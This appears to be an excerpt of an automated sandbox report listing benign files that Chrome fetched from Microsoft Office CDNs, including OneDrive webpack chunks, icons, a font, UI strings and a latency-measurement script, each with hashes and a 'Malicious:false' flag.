                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[243],{4153:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return s},d:function(){return o}});var a,i,r=n(725);function o(e){return(null==e?void 0:e.notificationType)===r.b.DataSyncListStatusChange}function s(e){return(null==e?void 0:e.notificationType)===r.b.FonDNotification}!function(e){e[e.UnknownError=0]="UnknownError"}(a||(a={})),function(e){e[e.SetupRequired=0]="SetupRequired",e[e.SignInRequired=1]="SignInRequired"}(i||(i={}))}.,2374:function(e,t,n){n.r(t),n.d(t,{spFolderItemSetItemAutoRefreshControlHandler:function(){return we}});var a,i=n("tslib_102"),r=n("react-lib"),o=n(328),s=n(41),c=n(22),d=n(5),l=n(55),u=n(118),f=n("odsp.util_460"),p=n(898),m=n(8400),_=n(1262),h=n(10);!function(e){e[e.New=0]="New",e[e.Update=1]="Update",e[e.Delete=2]="Delete"}(a||(a={}));var b=12e4,g={ODB:459},v=function(){function e(e){var t=this;this.isImproveRetryLogicKillswitchActivated=f.HW.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3820)
                                                  Category:downloaded
                                                  Size (bytes):18025
                                                  Entropy (8bit):5.410005870168186
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:98F0AE84F0B1A24BB1DE0C6C071F90EF
                                                  SHA1:3D3DB41E00E987151C9AE6973D99BF451EDB9A72
                                                  SHA-256:7BCD7DE595D5C2A0BE0BE2D00D9BE704D333296EF125AF28C406CE39FB7DA004
                                                  SHA-512:9353DD1E173C1FABF086788D4C6066BFF24F8AD49092B00DD04FD0CADC03CA260A1CDD873A4455FD4185847F2BBD62A629FB116B6234F6366620D7C2C40EFE32
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/50.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[50,245,260,277,1343],{3550:function(e,t,n){n.r(t),n.d(t,{registerCopilotSubCommandIcons:function(){return d}});var a=n("react-lib"),i=n("fui.util_369"),r=n(8042),o=n(8043),s=n(8044),c=!1,d=function(){c||((0,i.bV)({icons:{BookQuestionMark20Regular:a.createElement(r.i,null),Notepad20Regular:a.createElement(o.a,null),ChatSparkle20Regular:a.createElement(s.a,null),BranchCompare20Regular:a.createElement(r.n,null)}}),c=!0)}}.,8431:function(e,t,n){n.d(t,{a:function(){return d}});var a=n(12),i=n(3130),r=n(3270),o=n(3389),s=n(8432),c=n("odsp.util_460");function d(e){var t=e.color,n=e.style,d=e.className,l=t.background,u=t.accent,f=(0,o.a)(t.key),p=(0,i.a)(t.hexCode);return(0,a.h)("i",{className:d,style:n,role:"img","aria-label":c.OO(s.a,p),dangerouslySetInnerHTML:{__html:(0,r.a)({background:l,accent:u,gradId:f})}})}}.,8434:function(e,t,n){n.d(t,{a:function(){return l}});var a=n(171),i=n(12),r=n(400),o=n(2887),s=n(3389
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):615
                                                  Entropy (8bit):5.063824784590279
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FA6BCF5DA7977186676237FB70F6615A
                                                  SHA1:C3EA465F66923CAA73D2EE5D1A95EDCC0DEE6E03
                                                  SHA-256:8E0FA951A53605C52EF89E2CA9EC78D35961BA50B68DD9EEFE6E28026F8D24F0
                                                  SHA-512:36D95080B66875D39F4D215DB980119B92CB7C8BC59E0C205FC8511379040BE1CEED9D64EAC59F6A4549C309CD7E3071FACA09E822DC97966D64B2CDD1F78279
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/addtoonedrive/shortcutbadge_20_dark.svg
                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="20" height="20" rx="4" fill="#292929"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M16 1.4H4C2.56406 1.4 1.4 2.56406 1.4 4V16C1.4 17.4359 2.56406 18.6 4 18.6H16C17.4359 18.6 18.6 17.4359 18.6 16V4C18.6 2.56406 17.4359 1.4 16 1.4ZM4 0C1.79086 0 0 1.79086 0 4V16C0 18.2091 1.79086 20 4 20H16C18.2091 20 20 18.2091 20 16V4C20 1.79086 18.2091 0 16 0H4Z" fill="#999897"/>..<path d="M6 5H15M15 5V14M15 5L5 15" stroke="#479EF5" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6813)
                                                  Category:downloaded
                                                  Size (bytes):19651
                                                  Entropy (8bit):5.4395421866268885
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:119D2E67EA51AF3433B78F943FF52C9D
                                                  SHA1:EF7026CF40D2357A3C68C598E50BA576BF870DE8
                                                  SHA-256:21A65EB54709E307622895A13BBD0F7320E9CB84430B9A175D6D7B6B92B331C1
                                                  SHA-512:F547B375C357A40911F7627002DD5FC5664FBF1F5C6158E6DF36DBF332E1079AE371B5FD33A5BA811542B3EAD46A52810582AD1C264803A30A4A1D12A2E4403E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/23.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[23],{5946:function(e,t,n){n.d(t,{a:function(){return h}});var a=n("tslib_102"),i=n("react-lib"),r=n(33),o=n(367),s=n(47),c=n(469),d=n(470),l=n(3301),u=n(2841),f=n(137),p=n(152),m=(0,r.a)(),_={size:u.c.size48,presence:u.b.none,imageAlt:"",showOverflowTooltip:!0},h=i.forwardRef(function(e,t){var n=(0,o.a)(_,e),r=i.useRef(null),h=(0,f.a)(t,r),b=function(){return n.text||n.primaryText||""},g=function(e,t,a){var r=t&&t(n,a);return r?i.createElement("div",{dir:"auto",className:e},r):void 0},v=function(e,t){return void 0===t&&(t=!0),e?t?function(){return i.createElement(c.a,{content:e,overflowMode:d.a.Parent,directionalHint:p.a.topLeftEdge},e)}:function(){return i.createElement(i.Fragment,null,e)}:void 0},y=v(b(),n.showOverflowTooltip),S=v(n.secondaryText,n.showOverflowTooltip),D=v(n.tertiaryText,n.showOverflowTooltip),I=v(n.optionalText,n.showOverflowTooltip),x=n.hidePersonaDetails,C=n.onRenderOptionalText,O=void 0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (22828)
                                                  Category:downloaded
                                                  Size (bytes):35958
                                                  Entropy (8bit):5.598285444639106
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6202A7E2F67F6A2FAA8AAE229E1DE3C0
                                                  SHA1:2C5AA0BA4933E8CB59035D95F6BEAB771B213604
                                                  SHA-256:8B45F2ECBE7F5DE62B73E4C4038A3055E545D84A611120D6381336F88F72BAE3
                                                  SHA-512:892D8C281CE9277B1B1197D151607BA13350F7704F9CEE005C7A5CD1A64A87EE8455D3F792335046F043D4BF461EF9EF2D74661CCA944A266F66410EA7586F96
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/22.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[22],{8158:function(e,t,n){n.d(t,{a:function(){return A}});var a=n("react-lib"),i=n(160),r=n(159),o=n(236),s=n("fui.core_351"),c=n(220),d=n(1913);const l=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,u=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,f=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,m=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/;var _=n(8160),h=n(8161),b=n(8159);const g={active:"active",inactive:"inactive"},v=e=>e>=96?"extra-large":e>=64?"large":e>=56?"medium":e>=40?"small":e>=28?"extra-small":"tiny",y=["dark-red","cranberry","red","pumpkin","peach","marigold","gold","brass","brown","forest","seafoam","dark-green","light-teal","teal","steel","blue","royal-blue","cornflower","navy","lavender","purple","grape","lilac","pink","magenta","plum","beige"
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3674)
                                                  Category:downloaded
                                                  Size (bytes):4505
                                                  Entropy (8bit):4.973960122712231
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:48062B2603A1CB7BE7F16A3CB0E4FA74
                                                  SHA1:3BE5F5DAB9FBF6546E18B16704ECD9EEAFF56A54
                                                  SHA-256:12DD8F6DAE9CCF775216F7EE488513D6B40EB43A9135C8C64BC69898AA1BAD0E
                                                  SHA-512:B001347F64B9B4EBC5212CE60F89B74E1424B8E16369EF8F78876DFDFEA71ABE8A5453F419CE4DA7816B0EBFC191FAE2D4B0D76D69D3FEB5816F3A08B5E97002
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/3.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{8025:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return d},d:function(){return o},e:function(){return s},f:function(){return c},g:function(){return u},h:function(){return f},i:function(){return l}});var a=n(4723);const i=(0,a.a)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),r=(0,a.a)("Delete20Regular","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM5.74 15.23A2 2 0 0 0 7.73 17h4.54a2 2 0 0 0 1.99-1.77L15.44 5H4.56l1.18 10.23ZM8.5 7.5c.28 0 .5.2
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 16456, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):16456
                                                  Entropy (8bit):7.978911554918315
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FCC42193BA796ECDD5E6B78C9DDE06DF
                                                  SHA1:DC1175C6D15F6A437E9E1B9F4F41F48A22578F39
                                                  SHA-256:6B7F6E73F7A7F4D2C63311CF52B579FE053E5DE9782063DD91F3E409A9236086
                                                  SHA-512:83257F542C92015236C49D246EC3AD21FE07B43F8CDE7ADA0BD3534FDEBD951538CD51232C9E0759B498C9D18108D0610FD26276C4D96ADF3A8812BA53B81F6B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-19-6d6cd776.woff
                                                  Preview:wOFF......@H......m.........................OS/2.......G...`4.u.cmap...P...C.......4gasp................glyf......8X..]..peUhead..:....2...6%.hhea..;,.......$....hmtx..;H...a........loca..;...........&.maxp..<x....... .{.Jname..<........O..R.post..@4....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px...,.0.B2..@x....V..:.x....+.q..../..YxDI...Y.,l..z%.....GbP.45%!...$13%,.dkE6....F.9.l.745........5.d..)7...I....l...q.drL]b..c.m.c?....'8.9...unr.;.0.=..g...|......~i..j..j..k..h.vk..u@.uD.tN....k8.4&MtYq...2d......y.#.....L...Z.....a+..O\I&..E.38..6..=..E.;X..K.".nt...f..4\.A..P.....y..T.T.(.+8r$..+..-/.$!..kY.E....og6Nn....oy..t.............x..y|[.7~.]t%k....}.*.d9.";..Ip.;......H..BX.`....C..!Ca.em..k.3.og...N............y.....}?.?~..{...9..}.{.G.#D.A.Ox".Bma........~Ii......Vq..3_&P.>z.'$EV.IB..]4.......\.#..P..G#.\6...).;2.n..>.i......xW"....J....#.e.;.4...K?Y4.{..W.l....kY...y....c......k.d.L..e..........P..y....P..e..O}s...2.dYf.....(x.v..q..U
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:downloaded
                                                  Size (bytes):275
                                                  Entropy (8bit):5.388130648370224
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B541F22228E47108DE0CA980AD39A11C
                                                  SHA1:A50B53F212BE893AFBE1E7C2D99ED2923EB68FF8
                                                  SHA-256:5DBF54FEC414BEA2AD5285C532A3F4935D51F3B524601FD6647817E7C3A82579
                                                  SHA-512:EBD0B67DA123C0A84669D3F0F9BE0CAD209EE109E6DCF4C6970952CCAAB926C80AC8192D7E6D6FCA8EA37D81D413194A18D82928DE65703103DA27A2B9AE2EF6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/nextGenEngine.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[99948],{146152:(e,t,n)=>{n.r(t),n.d(t,{PlaybackSourceProviderBase:()=>i.e,PlayerEngineAdaptor:()=>a.C,setVideoElementStyle:()=>r.Es});var a=n(989453),i=n(664658),r=n(910589)}.}]);
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):928
                                                  Entropy (8bit):5.020158739694115
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C27EA21903DAC818E1C698443B027657
                                                  SHA1:38FC86DF752451F779A2431DA02ED038512BA454
                                                  SHA-256:77878A80C7001B06827DB1AC232D9E64C6D3436BEED9161BE124672F3401ED5C
                                                  SHA-512:E0DDDF39990C9BE96B6B8CCC0DC0DE698A6B434E9C5FFAB0D1BBBAA4B06A1EA8F8A2C994893A5389337CE64E950FBBB2B178F4DB5A27F22F93EDB6D629C54439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<svg width="20" height="20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M10 5 8.586 3.586A2 2 0 0 0 7.172 3H2a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="#FFB900"/><path d="M10 5 8.586 6.414A2 2 0 0 1 7.172 7H1v9a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="#FFD75E"/><path d="M10 5 8.586 6.414A2 2 0 0 1 7.172 7H1v9a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="url(#a)"/><path d="M2 16.5c-.373 0-.71-.142-.973-.367.061.492.477.863.973.867h16c.505 0 .905-.38.973-.867-.262.226-.6.367-.973.367H2z" fill="#BF5712"/><path opacity=".4" d="M8.836 6.914 10.75 5H10L8.586 6.414A2 2 0 0 1 7.172 7H1v.5h6.422a2 2 0 0 0 1.414-.586z" fill="#fff"/><defs><linearGradient id="a" x1="1" y1="5" x2="1" y2="17" gradientUnits="userSpaceOnUse"><stop stop-color="#fff" stop-opacity=".01"/><stop offset=".999" stop-color="#FFD75E" stop-opacity=".3"/></linearGradient></defs></svg>
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):17683
                                                  Entropy (8bit):4.173682806101172
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:021D61C493594A54C6A58EDD74E1ABC9
                                                  SHA1:D2DE94E17938C7385CB0B805BDFA9D8323DF108C
                                                  SHA-256:32B83506D44DDBA561881EE60761371C65CDA8B1AC51244B98E18A698F2F6E9F
                                                  SHA-512:5A17690157EC25BBB75005608B845BD4CBDFEBF2ED91293AA70DE5ADB458F64E3EDF99269993855AA9093121B03722416613EB58CD8E6DDD925DA09C8577D985
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_folder_v2_dark.svg
                                                  Preview:<svg width="280" height="280" viewBox="0 0 280 280" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M207.142 258.298L166.51 170.631C165.66 168.994 164.35 167.64 162.741 166.737C161.133 165.834 159.296 165.42 157.455 165.546L71.8844 175.231L70.7012 173.186L67.3237 167.36C66.5556 166.175 65.4867 165.216 64.2262 164.581C62.9657 163.945 61.559 163.656 60.15 163.743L48.7656 165.031L23.6208 167.875C20.1127 168.279 18.5983 171.128 20.2392 174.256L28.5383 190.088L67.4758 274.1C68.4382 275.992 70.028 277.49 71.9733 278.339C73.3883 279.026 74.9628 279.318 76.53 279.183L202.605 264.914C204.176 264.696 205.652 264.038 206.865 263.016C207.345 262.333 207.626 261.53 207.675 260.696C207.724 259.863 207.539 259.032 207.142 258.298Z" fill="url(#paint0_linear_3_3712)"/>..<path d="M219.827 166.526L167.359 172.462L92.894 180.889C91.086 181.17 89.4053 181.991 88.0726 183.245C86.7399 184.499 85.8176 186.126 85.4269 187.914L70.4187 273.696C70.2201 274.538 70.2611 275.42 70.5371 276.24C70.813 277.06
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2510)
                                                  Category:dropped
                                                  Size (bytes):2515
                                                  Entropy (8bit):5.518125695558101
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FD187E9DEE50C6F770E330769572EDF7
                                                  SHA1:2485E2DCAE609CB2BF9D7B17B9B71CD799030FBB
                                                  SHA-256:954D5A6E5FC72F3DE7498A82B410F4191642C9C3F25A520EB375D84DCEF77B39
                                                  SHA-512:4E55008ECF13EF0135A05E7CC9BE1C6EFCF942762F788DB08157FB015CE2A17AD876A10190308CEE620E6CD7EA1D6174EE45B7C37255AF157F8C6F12EE78B8B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[980],{4992:function(e,t,n){n.r(t),n.d(t,{getShortcutUrlOperationHandler:function(){return v}});var a=n("tslib_102"),i=n(493),r=n(6),o=n(7),s=n(28),c=n(184),d=n(79),l=n(29),u=n(21),f=n(2435),p=n(24),m=n(208),_=n("odsp.util_460"),h=n(2003),b=n(89),g=n(5),v=(0,u.e)()(function(e){var t=this,n=e.itemKey;return function(e){return(0,a.Zd)(t,void 0,void 0,function(){var t,u,v,y,S,D,I,x,C,O,w,E,A,L,k,M;return(0,a.qr)(this,function(P){switch(P.label){case 0:return(t=e((0,p.a)(function(e){return e.demandItemFacet(f.a,n)})))?(u=t.itemKey,v=e((0,i.a)({rowData:r.Wc,spItem:o.a},u)),y=v.rowData,S=v.spItem,(D=S&&e((0,p.a)(function(e){return e.demandItemFacet(r.Od,b.a.serialize({webAbsoluteUrl:S.webAbsoluteUrl,listFullUrl:S.listFullUrl}))})))&&S&&y&&"url"===y.File_x0020_Type?(I=y._ShortcutUrl)||_.HW.isActivated("29daf505-38af-4980-b966-f5a2e9eea564")?[3,3]:(x=S.webAbsoluteUrl,C=S.listFullUrl,O=new s.a(x).authority,[4,e((0,c.c)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):22282
                                                  Entropy (8bit):7.987867000618429
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DA7EF08CA0DC4552CE4498AFBCCD473A
                                                  SHA1:C22C096A78818689272E8D4D0D94A31BBB1AF5DF
                                                  SHA-256:C958FEC1BEB0AD85C367CC63C7BAA2138789061A7FECF4AF0902BB8DD7C51701
                                                  SHA-512:B5185328E445C2BDD373BA66080942AA010869BD28911B2EB1359917517C62A1D95747B7F2DE671864E6F560E4FD7FABD8B966CBA6B37E264E649D57F55A0782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_recent_v3_dark.webp
                                                  Preview:RIFF.W..WEBPVP8X..............ALPH.......m.H...<...c....O....xP....H.N...$.$.X7.J..hRAf..d...7.w-GA.6L.....!"& ..`..:.*,.....o...HES.....y..l.mg.........q......]..efFG.....5..s...}^.K....In.fIQ.xh....#..v$.$.T.....B.0.Q...*.#..d.a.&A.....|..$.....!;..=..sN.9.n6..~.m.m.m.~..d..9g<]...z<.'.'S.."..m+q+.Qq......o.....l.c........?..:...z<L8......?%.`.U.~..A..}..........WR.=(.;.F...j.N...N.9#5..VR.k.0...;...P@I...b`.Hw..*.......Y..9.:*.u....B...E....4Y...r....u.ze..SC....kU...o.:...b_...J$!...6z..k.A....[v.L.O...\4.mg.v*.Q..3......z.2U..L:).f9@...d...'..."..I..EI..1..#d.]...G....C.&.8v.[.xJfoVg.^.....t..w.l.+C...Wh...C..F.MTj.U.^.P9.y...)..Zm.....7.]Q3..6\IDiQR.,.:".H.x.'..X.-.9.P...p...,P...BW%^Z.s(....=....].8..Q.......$.J...k..[g\...p.B...'""....a..P...Ed..J..`..lAX...r,yHN."....iDA.1..i..y..Y=...T...a.....)t......V..v.I.... ...b5.".bElAy.C(C9O..........1.!....j4.T[....I.e.^.."h0OSP...H*...4C.b..........$..V.]....ea....Z..h.........3......V.I
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4551), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):4551
                                                  Entropy (8bit):5.389564111731932
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D845C7CFDF504D17DD1A01BC3F58D0E9
                                                  SHA1:4BF62628612111A63DED2B04639BCF918D0C4EB9
                                                  SHA-256:8FFBAC41E6195332D893B04AA93F305DDA63CC5317EE6D89E4D177CCCDE72240
                                                  SHA-512:3398BB9E265849D4A0B67047D9AC47DDA235DF7261BC95B9B8D0B4F7575C7E06C312592CE76C8CDA1C7109866B0F2A128D3161C99785C3EC872956BD432B75D7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Footprint=function(){var t=1,n=2,e=t|n,r=8,o=16,i=r|o,u=e|i,a=128,f=256,s=e|(a|f),c="http://",l=200,m="trans.gif",p="/apc/",g=5e3,d="trans.gif",h="100k.gif",v=822.128,w=1e3,T="GET",y="POST",M=-1,I="20190214",b="x-userhostaddress",D="x-endpoint",R="x-frontend";function q(t,n,e,r){if(!(n>=t.length)){e!==T&&e!==y&&(e=T);var o=function(){q(t,n+1,e,r)},i=new XMLHttpRequest;i.open(e,t[n],!0),i.onload=function(){4===i.readyState&&200===i.status?null!=r&&r(i):o()},i.onerror=o,i.timeout=g,i.ontimeout=o,i.send()}}function O(t,n){if(t<=0)return t;if(n&i&&t>0){var e=v/(t/w);return Math.round(e)}return Math.round(t)}function x(){function t(){return Math.floor(65536*(1+Math.random())).toString(16).substring(1)}return t()+t()+t()+t()+t()+t()+t()+t()}function H(){return!(!window.performance||!window.performance.getEntriesByName)}return{start:function(e,v,w,y,L){try{if(void 0===y&&(y=""),void 0===L&&(L=""),!e||0===e.trim().length||Number(w)!==w||w%1!=0||w<0)return;var S=L.trim().length>0,A=y.trim().len
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1761)
                                                  Category:dropped
                                                  Size (bytes):1766
                                                  Entropy (8bit):5.374844751953028
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B4252C169E97D2595A25235A674AE73A
                                                  SHA1:7A5DF5A612FDFAD0F057FE693BD4C7D520513446
                                                  SHA-256:C60F572E32F6FCF723218984180D7A6856BE2E6BC61C62FCA992A6F5F55218FF
                                                  SHA-512:8A2F5E6F0592A7B0FF19A6D9D5DE91F8ABB9EE7D373FEB7BF2B88C2E47B519A53669FBD2D78987D4BEA4D64915E9C45E56605840AB21FCC6FDB21BA8F8FEBEBC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1067],{4989:function(e,t,n){n.r(t),n.d(t,{ItemUpdateAvailabilityAction:function(){return S},NUCLEUS_ACTION_PREFIX:function(){return b},PINNED_ACTION_EVENTNAME:function(){return g},SPARSE_ACTION_EVENTNAME:function(){return v},UpdateItemAvailabilityAction:function(){return D}});var a=n("tslib_102"),i=n("react-lib"),r=n(9),o=n(8),s=n(3),c=n(15),d=n(510),l=n(40),u=n(1),f=new u.a("UpdateItemAvailabilityAction",{isAvailable:u.b}),p=n(509),m=n(6),_=n(36),h=n(43),b="NucleusAction.",g=b+"Pinned",v=b+"Sparse",y=(0,_.b)(function(e){return function(t){return(0,a.Zd)(void 0,void 0,void 0,function(){var i;return(0,a.qr)(this,function(a){switch(a.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(1440)]).then(n.bind(n,5429))];case 1:return i=a.sent().updateItemAvailability,[4,t(i(e))];case 2:return[2,a.sent()]}})})}}),S=(0,s.c)(function(e,t){for(var n,r=t.itemKeys,s=void 0===r?[]:r,u=void 0,_=!0,b=0,S=s;b<S.length
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:downloaded
                                                  Size (bytes):17147
                                                  Entropy (8bit):4.926675206527061
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8D75B8E85D749610931E168F2EFCF555
                                                  SHA1:11410945A27700DBE941C030189C637792AAC2CE
                                                  SHA-256:485A60AD5AF1CEFF60C50A9BFB08A03F0C42B984034A2255820356938B82B2A0
                                                  SHA-512:EA2196C089F4F10ABB20FBDB41E097C67211734F1C1919595E163CB5D90EAD00DF8D44629ADF854F84C666B2C0D8916DDDDA2F6555F495FDCEAE1BAB5419ECA0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://shell.cdn.office.net/shellux/en/shellstrings.8d75b8e85d749610931e168f2efcf555.json
                                                  Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading": "New",. "AllViewAdminSelectedGroupHeading": "Admin selected apps",. "AllViewMoreFirstPartyGroupHeading": "More from Microsoft",. "AllViewT
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (59425)
                                                  Category:dropped
                                                  Size (bytes):64758
                                                  Entropy (8bit):5.273247792783403
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FA3B663DF4BA8A04E3C9336B821CA9EE
                                                  SHA1:8D5907B8A6707FD9090F90A2E672353D5B0E70CE
                                                  SHA-256:5357300D4AD4B3A6B35A62AA4943A22F4B36087A0DDFC8270C9DE677D911CF6C
                                                  SHA-512:B4EE5133293549B6F14B22FA0CE2089E8CAC9DA29DF7E26E701D26529728BCAAB0D4F7188D98ECD5204EF2ED96985A7105C3B4DD2E9CAD298F672E2A3B9A88D2
                                                  Malicious:false
                                                  Reputation:unknown
